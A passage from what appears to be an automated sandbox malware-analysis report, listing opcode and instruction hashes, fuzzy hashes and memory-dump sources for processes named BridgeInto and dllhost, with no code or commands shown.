                                      • Opcode ID: b3368c1844a52ee59a3a97208f294735a0dec08c23f3eb80fd00a53f5a0f1fa5
                                      • Instruction ID: 3d52de3f35f9df7d9a6e88d21c665eabbc96a3d462fb370a86da02dbd3812ebe
                                      • Opcode Fuzzy Hash: b3368c1844a52ee59a3a97208f294735a0dec08c23f3eb80fd00a53f5a0f1fa5
                                      • Instruction Fuzzy Hash: 3121073130CC184FE768EE0CE88ADB973D1EF9A32130101BAE58EC7126E915EC8287C1
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 31ff291f4c9b94390fc26e03fa8a41bb33d41d45be31cac256c5429e7c625555
                                      • Instruction ID: 18ffcdb4930f3dea12d43b4e9a42a7b6b6f195984080c79e5c33889d2b212706
                                      • Opcode Fuzzy Hash: 31ff291f4c9b94390fc26e03fa8a41bb33d41d45be31cac256c5429e7c625555
                                      • Instruction Fuzzy Hash: B3315422B0DA661EF764B6F8A4AA1FA77C1DF96335B0400BED44EC31D3CC1C6C829280
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d217324ef66e4e25004fc3a1c530613dcfbc98aca58bdf306cf524b3f60a9340
                                      • Instruction ID: cedc483fa417dadda533909271d39d8a709ee4e8b6def9aa503b8cbcd9f84f71
                                      • Opcode Fuzzy Hash: d217324ef66e4e25004fc3a1c530613dcfbc98aca58bdf306cf524b3f60a9340
                                      • Instruction Fuzzy Hash: 8D41B731A0965A4FDB89EF78C8A59F97BE1FF5A310B0401BAD049D71A2DA2DA841CB40
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3187bc57587d800906e0b9a9eba71e801833588e6aa463e38e85794b56a40c83
                                      • Instruction ID: 40d370ea57dd1fbfd82ccf112cef51702d46b5607febaee6922835e0b1da17da
                                      • Opcode Fuzzy Hash: 3187bc57587d800906e0b9a9eba71e801833588e6aa463e38e85794b56a40c83
                                      • Instruction Fuzzy Hash: FB31F621B099650FEB58FA6894AA6B977C2EF9A321B5400BDD54EC32D3CD2CAC419341
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 271bd2c9e7f0a66cc3250f606f0c2accca71d3288ab21e219422579a7d011343
                                      • Instruction ID: fd4ee8b455df5adb19a12b5476357b7f5433fb923e00b72dbbccf08d1c10ff60
                                      • Opcode Fuzzy Hash: 271bd2c9e7f0a66cc3250f606f0c2accca71d3288ab21e219422579a7d011343
                                      • Instruction Fuzzy Hash: A3313A75B0DA598EE711DF68D8A12ED7BA0EF83335F1441B6D148CA1C3DB3C248AA781
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5240b7e1ac74e62c31e6d7d7829092f5cebbf3adf6076e2abd211180674e2013
                                      • Instruction ID: d3640c151b9eabe5449c08dd815cabe21c689c6d6a846803bd14715e9490a49f
                                      • Opcode Fuzzy Hash: 5240b7e1ac74e62c31e6d7d7829092f5cebbf3adf6076e2abd211180674e2013
                                      • Instruction Fuzzy Hash: A121C521B0DAAA0FE7C5EAA858F92F867C1EF9A314F4404BBD54DC25D3CC5D68D59302
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 99e2a06e11cb529d866ecab10411221a290bb8b877bf9f513159337d31a45cba
                                      • Instruction ID: 46093204883d5fc5ae4bf8d68acfddcb07924cd8e1171dcde9682b5b6856d107
                                      • Opcode Fuzzy Hash: 99e2a06e11cb529d866ecab10411221a290bb8b877bf9f513159337d31a45cba
                                      • Instruction Fuzzy Hash: 38217F71B19A294FE7D8EB68C8A56F9B3D1FFA9300F5041B6D04DC3192CD686CC18B40
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 632eeaeb019bd8f7c0fa8953c2a8cd982f86d65969ae015fe8d2c070821233e1
                                      • Instruction ID: 59897b745f8dedb038e6ece5392d1a56058f42bedff170126b7504b6ace47fbe
                                      • Opcode Fuzzy Hash: 632eeaeb019bd8f7c0fa8953c2a8cd982f86d65969ae015fe8d2c070821233e1
                                      • Instruction Fuzzy Hash: 69211B30E185698FDB65DF04D4A4BE9B3E1FB58314F1085AAC50EE3291CA79AE80CB80
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dbbcf8acb9f51da5d05d257d3922716d4595ef210c8aea85a61948bcadda95b2
                                      • Instruction ID: fe16f8f18c2d9d1dcd906e647ea9328d9c6a4d413458201c095d242eb62683d9
                                      • Opcode Fuzzy Hash: dbbcf8acb9f51da5d05d257d3922716d4595ef210c8aea85a61948bcadda95b2
                                      • Instruction Fuzzy Hash: DA11C275B0DA999FE712DF6888A11ED7BB0EF83321F1544B7C244DB182DA3C254AA790
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 793ee1beab58696b812ab94413fe63b1aaf5d66ff193e429914ce17cae4dcbae
                                      • Instruction ID: 70daf8ae526e94243236b2d1610c938a1a23082825e02f70d88f78fa486f0525
                                      • Opcode Fuzzy Hash: 793ee1beab58696b812ab94413fe63b1aaf5d66ff193e429914ce17cae4dcbae
                                      • Instruction Fuzzy Hash: 7E11AD75A0EA999FE712DF6888A01ED7BB0EF43321F1541B6C144DB192DA3C6A49A780
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0f9c12e68d7bdd0ea4cad898674509f5f58dbcaa69196b00a9b58fb96adde332
                                      • Instruction ID: 0ce9d0ecdbcfd2610b844af947209d4d9afb8b3a8b24aeb569bbd02f3c6ba226
                                      • Opcode Fuzzy Hash: 0f9c12e68d7bdd0ea4cad898674509f5f58dbcaa69196b00a9b58fb96adde332
                                      • Instruction Fuzzy Hash: 5801B132F0852A4AEB54AD69C4AA3FD73E2EF95311F004576D109D3181DE6CA9809780
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b508626ef6dacf0e9819857b53dc8f4a128181173a9a274d5f97f14ca55e2be2
                                      • Instruction ID: 4c14627fc67d2f5f8949c9be0efbc9b8ea393549d39e75a4a453d9f374aae551
                                      • Opcode Fuzzy Hash: b508626ef6dacf0e9819857b53dc8f4a128181173a9a274d5f97f14ca55e2be2
                                      • Instruction Fuzzy Hash: 4F018C75A0E6899FE712DF6488A00ED7BB0EF43320F1541F6D144DB192DA3C6A45A781
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34670000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5fb04a8ecc67890db30c3a10eeb76e0e86e6b84df3085faa2cf8fe9194738d51
                                      • Instruction ID: 7eaa5668710505c6a8770bc4da07a221a161bf327ad9446c4549618c61bbbb36
                                      • Opcode Fuzzy Hash: 5fb04a8ecc67890db30c3a10eeb76e0e86e6b84df3085faa2cf8fe9194738d51
                                      • Instruction Fuzzy Hash: 68F09020B0892B8FFA15EE18ACF46F93690FB46310F008175D589C2196EE2CEC01A285
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 18786064ab274e79cb2592b507bbd95a9cdd7215e55c823b072be294e999161e
                                      • Instruction ID: 25af3ee9509e85d46305e844819e3a43ee7af388d3c761f41bba948837a1e9b1
                                      • Opcode Fuzzy Hash: 18786064ab274e79cb2592b507bbd95a9cdd7215e55c823b072be294e999161e
                                      • Instruction Fuzzy Hash: 7EE0922294E3C14FCB1B8A2488B88A03F60DF2720474A50FBC149CF2B3D91D980AC701
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7ed5658f193dd664675722aada412d0781de334ca4db6afa0888a34df7ede998
                                      • Instruction ID: 98353e4fc3fb2548432acccc2c31ad9a839c99fe2402f8e1ebbbc4ceecd60958
                                      • Opcode Fuzzy Hash: 7ed5658f193dd664675722aada412d0781de334ca4db6afa0888a34df7ede998
                                      • Instruction Fuzzy Hash: 11E01A2294B7C04FCB4A9B2588A88847F70FE1721078A50EEC085CF5A3EA2D9859C711
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3bd34f00fa8fd4d890f6f06160335a76710df39a7892ce5255c82b03097de7ac
                                      • Instruction ID: 915de819bf1efd9f345cf0bf27a97d6c460ae6f4f90771eb041992e06c8c6a80
                                      • Opcode Fuzzy Hash: 3bd34f00fa8fd4d890f6f06160335a76710df39a7892ce5255c82b03097de7ac
                                      • Instruction Fuzzy Hash: 07E01A2194E7C04FC70B9B3588A98547FB0AE1721074A41EBC145CF5A3D91A8C49C711
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34670000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fbf7d0ca8ec400512d92f2c675d5e0aeeb378bd9c7d57550f8f72fc9be8dae07
                                      • Instruction ID: 1f9b85b0f92c6c0e64d04d7b04ea1e9a5fc38d9e77a08f7520a104eeca117ceb
                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e8498544355ad932467259601a785609382f03f77ce112762130e3c40fbd896c
                                      • Instruction ID: 4178b6ef4cfbe7e170c2fe6185dcdaa7c34edfa860ffad6c18479efdbb3749e8
                                      • Opcode Fuzzy Hash: e8498544355ad932467259601a785609382f03f77ce112762130e3c40fbd896c
                                      • Instruction Fuzzy Hash: 78E01A7154E7C04FCB16EB7488698547FB0EE6721178B41EEC146CF1B3E62E8849C711
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346a0000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0f65097b4c0d3ea82e5f5c5e47fd1d304130cf20107e9821f2888204894fea80
                                      • Instruction ID: a6bbaca167e469757cc414bf5b5adee137060f655625d7df89b77828cf4a9b33
                                      • Opcode Fuzzy Hash: 0f65097b4c0d3ea82e5f5c5e47fd1d304130cf20107e9821f2888204894fea80
                                      • Instruction Fuzzy Hash: 11E0B671E1992A8BE7A0DF98D8A82BD66E1EF95614F80013AD049E7295DE282C025650
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD346C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd346c1000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                      • Instruction ID: be60bb61b23a9739b54f0f41764dd9212fb0e2443a1ac7c4c437dabb5349ee8a
                                      • Opcode Fuzzy Hash: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                      • Instruction Fuzzy Hash: A5D02230B60C000F870CBA38889887033D0EB6A207B8000A8D00AC72B1D92ADC88C740
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                      • Instruction ID: fab944e319c1feb3e92c68a221436a8fdff2297cc52bc2b3e77900035b5644f2
                                      • Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                      • Instruction Fuzzy Hash: 37D012345668098FC650EB28D9D5894BA90FB0A214B8901D0D40CC71A1D39A9894C701
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d18e80f510b7454b457dd04e8256d1bc12cc23cb8ed179144c3c259b6b8a5607
                                      • Instruction ID: 1dc40e4b13cd0e24aaa99327bff96a2b72f5a012074c7d030570574b51e93189
                                      • Opcode Fuzzy Hash: d18e80f510b7454b457dd04e8256d1bc12cc23cb8ed179144c3c259b6b8a5607
                                      • Instruction Fuzzy Hash: 25C04C16F5AD3B01BC157D6E58E60FCA1406FD7A21FD51176D70CD00C59DCD20D52156
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                      • Instruction ID: f08b973c628f22c78451e1f57d208aa1cd9d771bfa9d39f9ffd83c9f8a033d07
                                      • Opcode Fuzzy Hash: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                      • Instruction Fuzzy Hash: 5CC08C305208088FCA48EB28C98480433E0FB0A200BC10090E008C7170D269DCC1C740
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2f343883bee5461eb025c2adc2cc40d575af058576cc95c2446b4c0d89b0cea1
                                      • Instruction ID: f737a38606767f2647a6fe6d7e9d9c7c52559b83262f043ccf03ee4e598a4f39
                                      • Opcode Fuzzy Hash: 2f343883bee5461eb025c2adc2cc40d575af058576cc95c2446b4c0d89b0cea1
                                      • Instruction Fuzzy Hash: 2BC08C00F0896A42F621A28480313BE00829F40708F540030E00EE23CACC4C5F0102C6
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                      • Instruction ID: 0e861303381caf619999a105ec1ac9ee3160302702a47f936a36cd7149efe04e
                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                      • Instruction Fuzzy Hash: 47B01204F5682F00A8043D7A08D20E470406B46510FC01074DA0CC008598CD20942242
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                      • Instruction ID: be61b1e624d3aefda69dbf88129ba16d7977287dd2fa89b736bd07e7d49666bd
                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                      • Instruction Fuzzy Hash: 2FC09B21F1D525C1FB25593044551FD71555F5A304F554571C14EE7081DE7C59056541
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845
                                      • Opcode ID: 55e1502d4f2cbba85a5a315411474ee340a588bdcb96266a5c91bc417db13d41
                                      • Instruction ID: 5f21b53e61e4cc1205d7d0275d84a0ddc0e5568a2cd430bef4e8112bb6c1df3d
                                      • Opcode Fuzzy Hash: 55e1502d4f2cbba85a5a315411474ee340a588bdcb96266a5c91bc417db13d41
                                      • Instruction Fuzzy Hash: 8551C503B4C66345E22237FDB4620FF6B88DFE237EB484677D18CE90934D19608686E5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5Z_H
                                      • API String ID: 0-3267294416
                                      • Opcode ID: f2c84476dbaa772fc6dd66bb3119a42caf0f7964d9fc0089356bf656381ceaf2
                                      • Instruction ID: a2cab7626e82948b04588ba7886b0b457fd82e1f559894b44f7388b52eb65706
                                      • Opcode Fuzzy Hash: f2c84476dbaa772fc6dd66bb3119a42caf0f7964d9fc0089356bf656381ceaf2
                                      • Instruction Fuzzy Hash: 1791E271A08B994FE799DFACC8753E97FE1FB66300F0041AAD249D72D2CA782815C750
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9e2e6a6b81e681211f9828fd125caa4ce6aecd58e2b2af9b90d36662518847ed
                                      • Instruction ID: 09a2d6676a8b6f22860ceec7c045db879ca85896edffaaabf332f6da374cdcd0
                                      • Opcode Fuzzy Hash: 9e2e6a6b81e681211f9828fd125caa4ce6aecd58e2b2af9b90d36662518847ed
                                      • Instruction Fuzzy Hash: 8251E172A18A598FE798CF9CC8A57E87FE1FB9A314F5001BED209D37D1CAB914258740
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 96eaaab7907db59c5e9c261e54b015b41a90df8e5c9c15836d384e321062bb8c
                                      • Instruction ID: b243aea91e8d69f4ba5a3beddb14fc92c2972928b0aa9c25ad23d9e29c5cd3a4
                                      • Opcode Fuzzy Hash: 96eaaab7907db59c5e9c261e54b015b41a90df8e5c9c15836d384e321062bb8c
                                      • Instruction Fuzzy Hash: 6441153270CA654FD724EBACE4A99FA7BD0EF9632570445BBD1CACB063DD14AC818781
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 87586421ccf69d3645c66a681accf7a2ee138fc9625de308e91f18f6e956dca0
                                      • Instruction ID: c58e116b785d2c98c6981b4d842bc00e108a106c8adb8346a7581b94f0e056d7
                                      • Opcode Fuzzy Hash: 87586421ccf69d3645c66a681accf7a2ee138fc9625de308e91f18f6e956dca0
                                      • Instruction Fuzzy Hash: 25411412B4D6A50EE724B7F8A8BA1FA7F90DF96325B1444BFD18EC7193CD1CA8418285
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                      • Instruction ID: cab018fffbddeebe180e5f702fddd9dc9dd0e53faa08d72be1b0c9af4aa03b65
                                      • Opcode Fuzzy Hash: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                      • Instruction Fuzzy Hash: 1021D83130CC184FE768EA5CEC89DB977D1EB5A32170541BAE58EC7165E921EC9287C1
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
